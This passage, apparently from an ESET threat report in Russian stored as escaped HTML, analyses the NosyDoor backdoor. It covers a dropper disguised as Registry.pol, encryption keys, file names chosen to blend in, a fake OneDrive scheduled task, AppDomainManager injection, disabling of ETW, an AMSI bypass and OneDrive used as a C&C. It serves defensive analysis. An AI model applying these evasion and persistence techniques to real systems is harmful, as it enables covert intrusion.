\u043f\u043e\u043a\u0430\u0437\u0430\u043d\u043d\u0443\u044e \u043d\u0430 \u0420\u0438\u0441\u0443\u043d\u043a\u0435 1. \u041f\u0435\u0440\u0432\u044b\u0439 \u044d\u0442\u0430\u043f \u2014 \u044d\u0442\u043e \u0434\u0440\u043e\u043f\u043f\u0435\u0440, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u0435\u0442 \u0432\u0442\u043e\u0440\u043e\u0439 \u044d\u0442\u0430\u043f, \u0432\u043a\u043b\u044e\u0447\u0430\u044e\u0449\u0438\u0439 \u0430\u0442\u0430\u043a\u0443 \u00ab\u0436\u0438\u0442\u044c \u0437\u0430 \u0441\u0447\u0435\u0442 \u0437\u0435\u043c\u043b\u0438\u00bb \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c <a href=\"https:\/\/attack.mitre.org\/techniques\/T1574\/014\/\">\u0442\u0435\u0445\u043d\u0438\u043a\u0438 \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u0438 AppDomainManager<\/a>, \u043a\u043e\u0442\u043e\u0440\u0430\u044f, \u0432 \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043e\u043a\u043e\u043d\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438, \u0441\u0430\u043c\u043e\u0433\u043e \u0431\u044d\u043a\u0434\u043e\u0440\u0430.<\/p>\n<p>NosyDoor \u0441\u043e\u0431\u0438\u0440\u0430\u0435\u0442 \u043c\u0435\u0442\u0430\u0434\u0430\u043d\u043d\u044b\u0435 \u043e \u043c\u0430\u0448\u0438\u043d\u0435 \u0436\u0435\u0440\u0442\u0432\u044b, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0438\u043c\u044f \u043c\u0430\u0448\u0438\u043d\u044b, \u0438\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u0432\u0435\u0440\u0441\u0438\u044e \u041e\u0421 \u0438 \u0438\u043c\u044f \u0442\u0435\u043a\u0443\u0449\u0435\u0433\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430, \u0438 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u0432\u0441\u0435 \u044d\u0442\u043e \u043d\u0430 C&amp;C. \u0417\u0430\u0442\u0435\u043c \u043e\u043d \u0438\u0437\u0432\u043b\u0435\u043a\u0430\u0435\u0442 \u0438 \u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u0435\u0442 \u0444\u0430\u0439\u043b\u044b \u0437\u0430\u0434\u0430\u0447 \u0441 \u043a\u043e\u043c\u0430\u043d\u0434\u0430\u043c\u0438 \u0441 C&amp;C. \u041a\u043e\u043c\u0430\u043d\u0434\u044b \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u0435\u043c\u0443, \u0441\u0440\u0435\u0434\u0438 \u043f\u0440\u043e\u0447\u0435\u0433\u043e, \u0438\u0437\u0432\u043b\u0435\u043a\u0430\u0442\u044c \u0444\u0430\u0439\u043b\u044b, \u0443\u0434\u0430\u043b\u044f\u0442\u044c \u0444\u0430\u0439\u043b\u044b \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0438.<\/p>\n<figure><img decoding=\"async\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 1. \u0426\u0435\u043f\u043e\u0447\u043a\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f NosyDoor 1\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/12-25\/longnosedgoblin\/figure-1-1.png\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 1. \u0426\u0435\u043f\u043e\u0447\u043a\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f NosyDoor\" width=\"\"><figcaption><em>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 1. \u0426\u0435\u043f\u043e\u0447\u043a\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f NosyDoor<\/em><\/figcaption><\/figure>\n<h4>\u042d\u0442\u0430\u043f 1 NosyDoor \u2013 \u0434\u0440\u043e\u043f\u043f\u0435\u0440<\/h4>\n<p>\u041f\u0435\u0440\u0432\u044b\u0439 \u044d\u0442\u0430\u043f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u2014 \u044d\u0442\u043e \u0434\u0440\u043e\u043f\u043f\u0435\u0440, \u0430 \u0438\u043c\u0435\u043d\u043d\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 C#\/.NET \u0441 \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u043c \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c <span>OneClickOperation<\/span>. \u041a\u0430\u043a \u0438 NosyHistorian, \u043e\u043d \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0447\u0435\u0440\u0435\u0437 \u0433\u0440\u0443\u043f\u043f\u043e\u0432\u0443\u044e \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0443. \u041c\u044b \u0432\u0438\u0434\u0435\u043b\u0438, \u043a\u0430\u043a \u0434\u0440\u043e\u043f\u043f\u0435\u0440 \u043c\u0430\u0441\u043a\u0438\u0440\u043e\u0432\u0430\u043b\u0441\u044f \u043f\u043e\u0434 <a href=\"https:\/\/learn.microsoft.com\/en-us\/previous-versions\/windows\/desktop\/policy\/registry-policy-file-format\">\u0444\u0430\u0439\u043b \u0433\u0440\u0443\u043f\u043f\u043e\u0432\u043e\u0439 \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0438 \u0440\u0435\u0435\u0441\u0442\u0440\u0430<\/a>, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u0438\u043c\u044f \u0444\u0430\u0439\u043b\u0430 <span>Registry.pol<\/span>, \u0445\u043e\u0442\u044f \u043c\u044b \u0442\u0430\u043a\u0436\u0435 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u043b\u0438 <span>Registry.plo<\/span>, \u0447\u0442\u043e \u043d\u0435\u043e\u0431\u044b\u0447\u043d\u043e (\u044d\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043e\u043f\u0435\u0447\u0430\u0442\u043a\u0430, \u0438\u043b\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043d\u0435 \u0445\u043e\u0442\u0435\u043b\u0438, \u0447\u0442\u043e\u0431\u044b \u0438\u043c\u044f \u0444\u0430\u0439\u043b\u0430 \u043a\u043e\u043d\u0444\u043b\u0438\u043a\u0442\u043e\u0432\u0430\u043b\u043e \u0441 \u0434\u0440\u0443\u0433\u0438\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c \u0444\u0430\u0439\u043b\u043e\u043c).<\/p>\n<p>\u0414\u0440\u043e\u043f\u043f\u0435\u0440 \u0434\u0435\u043a\u043e\u0434\u0438\u0440\u0443\u0435\u0442 \u0432\u0441\u0442\u0440\u043e\u0435\u043d\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u0438\u0437 base64 \u0438 \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u044b\u0432\u0430\u0435\u0442 \u0438\u0445 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Data Encryption Standard (DES) \u0441 \u043a\u043b\u044e\u0447\u043e\u043c \u0438 \u0432\u0435\u043a\u0442\u043e\u0440\u043e\u043c \u0438\u043d\u0438\u0446\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438, \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u043c\u0438 \u0432 <span>UevAppMo<\/span> (\u043f\u0435\u0440\u0432\u044b\u0435 \u0432\u043e\u0441\u0435\u043c\u044c \u0431\u0430\u0439\u0442\u043e\u0432 \u0441\u0442\u0440\u043e\u043a\u0438 <span>UevAppMonitor<\/span>), \u0437\u0430\u0442\u0435\u043c \u043f\u043e\u043c\u0435\u0449\u0430\u0435\u0442 \u0438\u0445 \u0432 <span>C:WindowsMicrosoft.NETFramework<\/span> \u043f\u043e\u0434 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c\u0438 \u0438\u043c\u0435\u043d\u0430\u043c\u0438 \u0444\u0430\u0439\u043b\u043e\u0432:<\/p>\n<ul>\n<li><span>SharedReg.dll<\/span><\/li>\n<li><span>log.cached<\/span><\/li>\n<li><span>netfxsbs9.hkf<\/span><\/li>\n<li><span>UevAppMonitor.exe.config<\/span><\/li>\n<\/ul>\n<p>\u042d\u0442\u0438 \u0438\u043c\u0435\u043d\u0430 \u0444\u0430\u0439\u043b\u043e\u0432 \u0431\u044b\u043b\u0438 \u0432\u044b\u0431\u0440\u0430\u043d\u044b \u043d\u0430\u043c\u0435\u0440\u0435\u043d\u043d\u043e, \u0447\u0442\u043e\u0431\u044b \u0441\u043b\u0438\u0442\u044c\u0441\u044f \u0441 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u043c\u0438 \u0444\u0430\u0439\u043b\u0430\u043c\u0438, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043a\u0430\u0442\u0430\u043b\u043e\u0433 \u043e\u0431\u044b\u0447\u043d\u043e \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0444\u0430\u0439\u043b\u044b \u0441 \u0438\u043c\u0435\u043d\u0430\u043c\u0438 <span>SharedReg12.dll<\/span> \u0438 <span>netfxsbs12.hkf<\/span>.<\/p>\n<p>\u041d\u0430 \u0437\u0430\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u044d\u0442\u0430\u043f\u0430\u0445 \u0434\u0440\u043e\u043f\u043f\u0435\u0440 \u0441\u043e\u0437\u0434\u0430\u0435\u0442 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u0437\u0430\u0434\u0430\u0447\u0443 Windows \u0441 \u0438\u043c\u0435\u043d\u0435\u043c <span>OneDrive Reporting Task-S-1-5-21-&lt;GUID&gt;<\/span> \u0432 \u043f\u0430\u043f\u043a\u0435 \u0437\u0430\u0434\u0430\u0447 Microsoft, \u0433\u0434\u0435 <span>&lt;GUID&gt;<\/span> \u2014 \u044d\u0442\u043e \u0441\u0442\u0440\u043e\u043a\u0430 \u0441\u043b\u0443\u0447\u0430\u0439\u043d\u043e\u0433\u043e GUID. \u041f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0449\u0438\u043a \u043e\u0442\u0432\u0435\u0447\u0430\u0435\u0442 \u0437\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u0437\u0430\u043a\u043e\u043d\u043d\u043e\u0433\u043e <span>UevAppMonitor.exe<\/span> \u0432 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0435 <span>C:WindowsMicrosoft.NETFramework<\/span> \u0432\u043e \u0432\u0440\u0435\u043c\u044f \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u044b. \u0414\u0440\u043e\u043f\u043f\u0435\u0440 \u043a\u043e\u043f\u0438\u0440\u0443\u0435\u0442 \u0437\u0430\u043a\u043e\u043d\u043d\u044b\u0439 \u0444\u0430\u0439\u043b \u0438\u0437 <span>C:WindowsSystem32<\/span> \u0432 \u043d\u043e\u0432\u043e\u0435 \u043c\u0435\u0441\u0442\u043e.<\/p>\n<p>\u0411\u043e\u043b\u0435\u0435 \u043d\u043e\u0432\u044b\u0435 \u043e\u0431\u0440\u0430\u0437\u0446\u044b \u0442\u0430\u043a\u0436\u0435 \u0432\u043a\u043b\u044e\u0447\u0430\u044e\u0442 \u0437\u0430\u0449\u0438\u0442\u043d\u044b\u0439 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0437\u0430\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0434\u0440\u043e\u043f\u043f\u0435\u0440 \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0442\u043e\u043b\u044c\u043a\u043e \u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430\u0445 \u0436\u0435\u0440\u0442\u0432 \u0441 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u043c \u0438\u043c\u0435\u043d\u0435\u043c \u043c\u0430\u0448\u0438\u043d\u044b (\u0441\u043c. \u0420\u0438\u0441\u0443\u043d\u043e\u043a 2).<\/p>\n<figure><img decoding=\"async\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 2. \u041a\u043e\u0434 \u0434\u0440\u043e\u043f\u043f\u0435\u0440\u0430\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/12-25\/longnosedgoblin\/figure-2.png\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 2. \u041a\u043e\u0434 \u0434\u0440\u043e\u043f\u043f\u0435\u0440\u0430 \u0441 \u0437\u0430\u0449\u0438\u0442\u043d\u044b\u043c\u0438 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u0430\u043c\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f\" width=\"\"><figcaption><em>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 2. \u041a\u043e\u0434 \u0434\u0440\u043e\u043f\u043f\u0435\u0440\u0430 \u0441 \u0437\u0430\u0449\u0438\u0442\u043d\u044b\u043c\u0438 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u0430\u043c\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f<\/em><\/figcaption><\/figure>\n<h4>\u042d\u0442\u0430\u043f 2 NosyDoor \u2013 \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u044f AppDomainManager<a><\/a><\/h4>\n<p><span>UevAppMonitor.exe<\/span> \u2014 \u044d\u0442\u043e \u0437\u0430\u043a\u043e\u043d\u043d\u043e\u0435 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 C#\/.NET, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e \u0441\u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043b\u043e \u0438\u0437 <span>C:WindowsSystem32<\/span> \u0432 \u043a\u0430\u0442\u0430\u043b\u043e\u0433 <span>C:WindowsMicrosoft.NETFramework<\/span> \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u043e \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0431\u0438\u043d\u0430\u0440\u043d\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 \u00ab\u0436\u0438\u0442\u044c \u0437\u0430 \u0441\u0447\u0435\u0442 \u0437\u0435\u043c\u043b\u0438\u00bb \u0438\u043b\u0438 <a href=\"https:\/\/lolbas-project.github.io\/\">LOLBin<\/a>. \u0410\u0442\u0430\u043a\u0438 \u00ab\u0436\u0438\u0442\u044c \u0437\u0430 \u0441\u0447\u0435\u0442 \u0437\u0435\u043c\u043b\u0438\u00bb \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0437\u0430\u043a\u043e\u043d\u043d\u044b\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b, \u0443\u0436\u0435 \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0435 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435. \u0412 \u0434\u0430\u043d\u043d\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u0437\u0430\u043f\u0443\u0441\u043a\u0430 <a href=\"https:\/\/web.archive.org\/web\/20250330053546\/https:\/www.rapid7.com\/blog\/post\/2023\/05\/05\/appdomain-manager-injection-new-techniques-for-red-teams\/\">\u0438\u043d\u044a\u0435\u043a\u0446\u0438\u0438 AppDomainManager<\/a> \u0447\u0435\u0440\u0435\u0437 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0439 \u0444\u0430\u0439\u043b. \u042d\u0442\u0430 \u0442\u0435\u0445\u043d\u0438\u043a\u0430 \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f, \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0435 \u0432 \u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a\u0435 .NET, \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043a\u043e\u0434 \u0432\u043c\u0435\u0441\u0442\u043e \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u0435\u043c\u043e\u0433\u043e \u0437\u0430\u043a\u043e\u043d\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u043a\u043b\u0430\u0441\u0441 AppDomainManager.<\/p>\n<p>\u041a\u043e\u0433\u0434\u0430 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442\u0441\u044f, \u043e\u043d\u043e \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0439 \u0444\u0430\u0439\u043b, \u043f\u043e\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u0439 \u043d\u0430 \u0420\u0438\u0441\u0443\u043d\u043a\u0435 3, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0437\u0430\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 \u0432\u044b\u0437\u044b\u0432\u0430\u0442\u044c \u043c\u0435\u0442\u043e\u0434 <span>InitializeNewDomain<\/span> \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u043a\u043b\u0430\u0441\u0441\u0430 <span>SharedReg<\/span> \u0432 <span>SharedReg.dll<\/span>. \u041a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f \u0442\u0430\u043a\u0436\u0435 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u0442 \u0434\u043b\u044f \u044d\u043b\u0435\u043c\u0435\u043d\u0442\u0430 <a href=\"https:\/\/learn.microsoft.com\/en-us\/dotnet\/framework\/configure-apps\/file-schema\/runtime\/etwenable-element\">&lt;etwEnable&gt;<\/a> \u0430\u0442\u0440\u0438\u0431\u0443\u0442 <span>enabled<\/span> \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 <span>false<\/span>, \u0447\u0442\u043e\u0431\u044b \u0442\u0440\u0430\u0441\u0441\u0438\u0440\u043e\u0432\u043a\u0430 \u0441\u043e\u0431\u044b\u0442\u0438\u0439 \u0434\u043b\u044f Windows \u0431\u044b\u043b\u0430 \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0430.<\/p>\n<figure><img decoding=\"async\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 3. \u0421\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 UevAppMonitor.exe.config \u0441 \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u043c AppDomainManager\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/12-25\/longnosedgoblin\/figure-3.png\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 3. \u0421\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 UevAppMonitor.exe.config \u0441 \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u043c AppDomainManager\" width=\"\"><figcaption><em>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 3. \u0421\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 <\/em><span>UevAppMonitor.exe<\/span><em>.config \u0441 \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u043c AppDomainManager<\/em><\/figcaption><\/figure>\n<p><span>SharedReg.dll<\/span> \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u043a\u043e\u0434 \u0434\u043b\u044f \u043e\u0431\u0445\u043e\u0434\u0430 <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/amsi\/antimalware-scan-interface-portal\">AMSI<\/a> \u0438\u0437 \u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a\u0430 \u043e\u0431\u0445\u043e\u0434\u0430 AV\/EDR \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c <a href=\"https:\/\/github.com\/klezVirus\/inceptor\">inceptor<\/a>. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u043e\u043d \u0434\u0435\u043a\u043e\u0434\u0438\u0440\u0443\u0435\u0442 \u0444\u0430\u0439\u043b <span>netfxsbs9.hkf<\/span> \u0438\u0437 base64, \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u044b\u0432\u0430\u0435\u0442 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e AES \u0441 \u043a\u043b\u044e\u0447\u043e\u043c <span>UevAppMonitor<\/span>, \u0434\u043e\u043f\u043e\u043b\u043d\u0435\u043d\u043d\u044b\u043c \u043d\u0443\u043b\u0435\u0432\u044b\u043c\u0438 \u0431\u0430\u0439\u0442\u0430\u043c\u0438 \u0434\u043e \u0434\u043b\u0438\u043d\u044b 16, \u0432\u0435\u043a\u0442\u043e\u0440\u043e\u043c \u0438\u043d\u0438\u0446\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 <span>0<\/span>, \u0438, \u043d\u0430\u043a\u043e\u043d\u0435\u0446, \u0441\u043d\u043e\u0432\u0430 \u0434\u0435\u043a\u043e\u0434\u0438\u0440\u0443\u0435\u0442 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u0438\u0437 base64. \u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u043e\u043c \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f NosyDoor, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0437\u0430\u0442\u0435\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f. \u041b\u044e\u0431\u044b\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u044e\u0442\u0441\u044f \u0432 \u0444\u0430\u0439\u043b <span>error.txt<\/span> \u0432 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0435 <span>C:WindowsMicrosoft.NETFramework<\/span>.<\/p>\n<h4>\u042d\u0442\u0430\u043f 3 NosyDoor \u2013 \u043f\u043e\u043b\u0435\u0437\u043d\u0430\u044f \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0430<\/h4>\n<p>\u0422\u0440\u0435\u0442\u0438\u0439 \u044d\u0442\u0430\u043f NosyDoor, \u043e\u0441\u043d\u043e\u0432\u043d\u0430\u044f \u043f\u043e\u043b\u0435\u0437\u043d\u0430\u044f \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0430, \u2014 \u044d\u0442\u043e \u0431\u044d\u043a\u0434\u043e\u0440 C#\/.NET \u0441 \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u043c \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c OneDrive \u0438 \u043f\u0443\u0442\u0435\u043c PDB <span>E:CsharpThomasServerThomasOneDriveobjReleaseOneDrive.pdb<\/span>. \u041a\u0430\u043a \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u0438\u0437 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044f, \u0431\u044d\u043a\u0434\u043e\u0440 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u044b, \u0432 \u0434\u0430\u043d\u043d\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 Microsoft OneDrive, \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 C&amp;C.<\/p>\n<p>\u041f\u043e\u043b\u043d\u044b\u0439 \u0441\u043f\u0438\u0441\u043e\u043a \u0441\u043e\u0431\u0438\u0440\u0430\u0435\u043c\u044b\u0445 \u0431\u044d\u043a\u0434\u043e\u0440\u043e\u043c \u043c\u0435\u0442\u0430\u0434\u0430\u043d\u043d\u044b\u0445 \u0441\u043e\u0441\u0442\u043e\u0438\u0442 \u0438\u0437 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0433\u043e:<\/p>\n<ul>\n<li>\u0432\u043d\u0435\u0448\u043d\u0438\u0439 IPv4-\u0430\u0434\u0440\u0435\u0441,<\/li>\n<li>\u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0439 IPv4-\u0430\u0434\u0440\u0435\u0441,<\/li>\n<li>\u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 \u0430\u0433\u0435\u043d\u0442\u0430,<\/li>\n<li>\u0438\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f,<\/li>\n<li>\u0438\u043c\u044f \u043c\u0430\u0448\u0438\u043d\u044b,<\/li>\n<li>\u0442\u0435\u043a\u0443\u0449\u0438\u0439 \u043a\u0430\u0442\u0430\u043b\u043e\u0433,<\/li>\n<li>\u0442\u0435\u043a\u0443\u0449\u0438\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 (\u0438\u043c\u044f, ID, \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440\u0430),<\/li>\n<li>\u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u044d\u0442\u0430\u043f\u0430 3,<\/li>\n<li>\u0442\u0435\u043a\u0443\u0449\u0435\u0435 \u043c\u0435\u0441\u0442\u043d\u043e\u0435 \u0432\u0440\u0435\u043c\u044f,<\/li>\n<li>\u0432\u0435\u0440\u0441\u0438\u044f \u041e\u0421,<\/li>\n<li><span>CodeType<\/span> (\u0441\u043c. \u0422\u0430\u0431\u043b\u0438\u0446\u0443 3), \u0438<\/li>\n<li><span>AgentType<\/span> (\u0441\u043c. \u0422\u0430\u0431\u043b\u0438\u0446\u0443 3).<\/li>\n<\/ul>\n<p>\u0412\u0441\u0435 \u0441\u043e\u0431\u0440\u0430\u043d\u043d\u044b\u0435 \u043c\u0435\u0442\u0430\u0434\u0430\u043d\u043d\u044b\u0435 \u0448\u0438\u0444\u0440\u0443\u044e\u0442\u0441\u044f \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e RSA, \u0430 \u0437\u0430\u0442\u0435\u043c \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u044e\u0442\u0441\u044f \u0432 OneDrive \u043a\u0430\u043a \u0444\u0430\u0439\u043b <span>Read_&lt;agent_id&gt;.max<\/span>. \u041a\u0430\u043a \u0442\u043e\u043b\u044c\u043a\u043e 